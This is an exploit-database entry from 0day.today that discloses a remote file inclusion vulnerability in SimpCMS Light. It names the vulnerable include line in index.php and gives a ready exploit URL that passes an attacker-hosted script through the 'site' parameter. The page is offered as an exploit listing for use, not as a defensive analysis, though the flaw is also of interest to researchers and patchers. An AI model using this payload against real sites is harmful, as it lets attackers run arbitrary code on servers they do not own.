[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

SimpCMS <= 04.10.2007 (site) Remote File Inclusion Vulnerability

Author
Dr.RoVeR
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1735
Category
web applications
Date add
09-04-2007
Platform
unsorted
================================================================
SimpCMS <= 04.10.2007 (site) Remote File Inclusion Vulnerability
================================================================



Bug Found By Dr.RoVeR -->Arab48 Hacker
---

Script: SimpCMS Light

Download: http://www.simpcms.com/light/normal/simp-cms-light.zip

--

Bug File: index.php

Bug code in line 31:
include $site.".php";

--

Exploit:
http://site.com/[path]/index.php?site=[EvilScript]



#  0day.today [2024-11-15]  #